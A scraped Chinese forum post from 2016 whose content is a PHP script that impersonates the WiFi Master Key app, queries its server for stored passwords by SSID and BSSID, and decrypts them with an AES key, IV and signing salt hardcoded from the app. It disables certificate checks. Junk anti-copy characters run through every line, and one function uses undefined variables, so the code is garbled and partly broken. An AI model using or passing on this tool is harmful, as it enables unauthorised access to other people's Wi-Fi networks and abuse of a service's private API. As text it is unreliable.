上尉
- 注册时间
- 2010-7-6
- 金币
- 1189 个
- 威望
- 18 个
- 荣誉
- 0 个
尚未签到
|
<form action="" method="post">
% C! `7 g7 k9 p6 B& ` <p>ssid: <input type="text" name="ssid" /></p>0 o/ g# {9 x4 @) e# c6 G b
<p>bssid: <input type="text" name="bssid" /></p>9 k- v G+ @ L* g
<input type="submit" value="提交" />
: w, o. _7 ~5 M+ m( ]</form># B& H: _7 r6 {; A( |( [+ E6 q
7 `# E9 d7 E0 _6 \8 q<?php
' {% F' l9 C! S$bssid = $_POST["bssid"] ;
; { c! U* g- t% R# V/ f$ssid = $_POST["ssid"] ;" l- l3 F- X; n# ]
if (isset( $bssid ) && isset( $ssid )){4 E4 e2 D. Z, E$ |8 I
//update salt$ p; _3 J+ m* }5 \
$ret = request( $bssid , $ssid , md5(rand(1, 10000)));) ]; S/ l' R( p
$ret = json_decode( $ret );. \2 i8 M# [/ s- B7 y1 \
$ret = request( $bssid , $ssid , $ret ->retSn);# n% N( }. D8 w! d, L p7 @
$ret = json_decode( $ret );5 t2 X# E3 I/ h8 v+ g8 |0 f
if ( $ret ->retCd == 0){7 w$ M! Y2 L2 t- W9 j
if ( $ret ->qryapwd->retCd == 0){2 E9 b: i0 i: [' i0 Y& G8 ^8 [2 {
$list = $ret ->qryapwd->psws;
0 w; s& H1 o# G4 p1 W5 Y foreach ( $list as $wifi ){! ~- g6 S- [8 ~7 a; q2 ]" J
echo 'SSID: ' . $wifi ->ssid. "<br>" ;: i! Q0 ?2 V; @1 Z2 [ `' F
echo 'PWD: ' .decryptStrin( $wifi ->pwd). "<br>" ;. y# F% b, S8 p0 { _- D' F, X
echo 'BSSID: ' . $wifi ->bssid. "<br>" ;* x. V0 w# f: I! V/ x
if ( $wifi ->xUser){% S) c0 i6 ?, m6 B+ J
echo 'xUser: ' . $wifi ->xUser. "<br>" ;4 j8 M$ X! f% `5 O1 k) R
echo 'xPwd: ' . $wifi ->xPwd. "<br>" ;4 q1 Q+ ^' s. q9 v J
}
) Q9 W) d, [( H1 m _2 M/ D }
+ k4 y: P8 k; R$ ^2 |4 s }" W" }* K3 |1 B" g5 D: [# T
else {& V& E! X- Z j: w2 e- V# M. ? I
echo $ret ->qryapwd->retMsg;
! f$ ^8 G' s8 P# B; r }5 P3 l2 ] Q" A
}
* J& T% p) I& g4 { `% B0 u}8 X- s, t, e. P- K1 b& B
function request( $bssid , $ssid , $salt , $dhid = 'ff8080814cc5798a014ccbbdfa375369' ){
5 A8 [5 } B+ Y: ?' l" D6 e3 } $data = array ();/ k) i A. | u& Z1 H
$data [ 'appid' ] = '0008' ;
% e& o# J+ S2 B' w $data [ 'bssid' ] = $bssid ;
) V( O" }1 |* h' B% z( m $data [ 'chanid' ] = 'gw' ;
0 A' h: r/ v, H$ p $data [ 'dhid' ] = $dhid ;+ C& _% U! Z7 ?% j7 ?9 }
$data [ 'ii' ] = '609537f302fc6c32907a935fb4bf7ac4' ;$ T0 s7 x+ G/ X
$data [ 'lang' ] = 'cn' ;/ v) `" m7 Q6 N, Q- M# @: V" K# q
$data [ 'mac' ] = '60f81dad28dh' ;$ \* l3 b+ e- |$ \
$data [ 'method' ] = 'getDeepSecChkSwitch' ;
' E0 s$ W) e2 ]$ \) G $data [ 'pid' ] = 'qryapwd:commonswitch' ;: Y8 c# _0 R2 D% k6 z6 j* L
$data [ 'ssid' ] = $ssid ;0 |1 u! z7 _5 f' G4 D* f
$data [ 'st' ] = 'm' ;! }8 j6 ~! B6 q
$data [ 'uhid' ] = 'a0000000000000000000000000000002' ;/ C. r- ?$ N' g3 g$ \3 N/ `0 O; [
$data [ 'v' ] = '324' ;( s+ y9 J! x$ ^* ?3 q( O
$data [ 'sign' ] = sign( $data , $salt );2 L* [6 F" q" I% o5 V! P
$curl = curl_init();
! d9 @! H1 b- Q! R curl_setopt( $curl , CURLOPT_URL, 'http://wifiapi02.51y5.net/wifiapi/fa.cmd' );
. T7 Q/ D6 W) j/ _6 s8 a curl_setopt( $curl , CURLOPT_USERAGENT, 'WiFiMasterKey/1.1.0 (Mac OS X Version 10.10.3 (Build 14D136))' );; p9 e2 B0 E6 Z" ?
curl_setopt( $curl , CURLOPT_SSL_VERIFYPEER, false); // stop verifying certificate
O3 S+ w0 ?& Y' g. ?! k N; q3 g curl_setopt( $curl , CURLOPT_RETURNTRANSFER, true);
' R: {4 f/ F! k2 g/ v4 U curl_setopt( $curl , CURLOPT_POST, true); // enable posting
; ]3 b( f: G- a3 [2 D& U3 E ^ curl_setopt( $curl , CURLOPT_POSTFIELDS, http_build_query( $data )); // post images
; m; N- ?* e( Y0 ?/ z# J( j curl_setopt( $curl , CURLOPT_FOLLOWLOCATION, true); // if any redirection after upload# m2 e. d5 P5 k" ?7 ^7 |# Y& x
$r = curl_exec( $curl );7 @, r z2 O0 P; y% a0 ]8 |% e1 \5 J
curl_close( $curl );
5 c. D, g |5 P6 ~, Q9 O& ]+ } return $r ;# Y2 o; b: B8 E
}
^8 H' x" y/ b5 m1 W3 e. lfunction registerNewDevice(){, @/ y) J+ p1 ]1 a1 d6 \1 B
$salt = '1Hf%5Yh&7Og$1Wh!6Vr&7Rs!3vj#1Aa$' ;
0 ^. D' @+ R N* r$ B! H9 E; X $data = array ();" Z9 W- a$ S+ k! }8 W% U( u. J
$data [ 'appid' ] = '0008' ;
. F5 ?* k( ]4 j1 o3 H $data [ 'bssid' ] = $bssid ;
, _& u2 k/ g0 J. w( b& h" a $data [ 'chanid' ] = 'gw' ;
( _6 n5 P0 ?4 ^" b3 V Y4 d $data [ 'dhid' ] = $dhid ;
2 E0 D; o9 ?' M o0 U0 } $data [ 'ii' ] = '609537f302fc6c32907a935fb4bf7ac9' ;5 x$ O& P* k! @2 @! o. l ?
$data [ 'lang' ] = 'cn' ;
) N9 U6 i0 F7 u! L! i( V5 }0 L $data [ 'mac' ] = '60f81dad28de' ;
- _3 g" T! S5 w* @ $data [ 'method' ] = 'getDeepSecChkSwitch' ;' H) H- m2 I2 f" z
$data [ 'pid' ] = 'qryapwd:commonswitch' ;# ?/ F7 J( |9 ?' X# G6 A
$data [ 'ssid' ] = $ssid ;! n6 u' x# F- f# |7 z
$data [ 'st' ] = 'm' ;8 y; g+ j$ P# ] H
$data [ 'uhid' ] = 'a0000000000000000000000000000001' ;
0 t8 r$ f5 V e+ b" k7 r4 {: ` $data [ 'v' ] = '324' ;0 V# A! T8 n- ]$ A! D2 O$ m
$data [ 'sign' ] = sign( $data , $salt );
! V6 L/ {1 N5 v9 f) e" z/ y- F}9 V* F# o8 J3 `/ t H) i8 F0 c {+ o
function sign( $array , $salt ){! o" _. h; g; W( r
// 签名算法
& q7 a! |' @7 R% I+ M $request_str = '' ;
, X* J; K5 s9 P1 F; { // 对应apk中的 Arrays.sort 数组排序,测试PHP需用 ksort; `4 ^& C+ `% T* l$ d( t+ u* }
ksort( $array );
4 X' ^( d2 }# _/ n( G* N) H foreach ( $array as $key => $value ) { ^% w$ M7 X3 G5 \7 ^0 F& B
$request_str .= $value ;" {+ A4 J j, N) e6 W2 T
}
; l% S- Z- M: r4 k+ a% a $sign = md5( $request_str . $salt );
! d. |5 D. F9 F' F1 G" X% u- X$ t return strtoupper ( $sign );
2 v4 b% J& L+ |2 E}
; [( E: N) G) |; Sfunction decryptStrin( $str , $keys = 'k%7Ve#8Ie!5Fb&8E' , $iv = 'y!0Oe#2Wj#6Pw!3V' , $cipher_alg =MCRYPT_RIJNDAEL_128){, |) ?& [; u& p* ?
//Wi-Fi万能钥匙密码采用 AES/CBC/NoPadding 方式加密
4 |, {% S$ {+ r5 v+ Q //[length][password][timestamp]/ O; S6 S1 d+ [8 O# @2 \" y4 U
$decrypted_string = mcrypt_decrypt( $cipher_alg , $keys , pack( "H*" , $str ),MCRYPT_MODE_CBC, $iv );
' a- f3 u3 n$ |+ M: n9 E% X% H4 p return substr (trim( $decrypted_string ),3,-13);! ~9 T5 G$ r i
} ?> |
评分
-
1
查看全部评分
-
|
[复制链接]
IP卡
狗仔卡
发表于 2016-8-22 03:03
显身卡
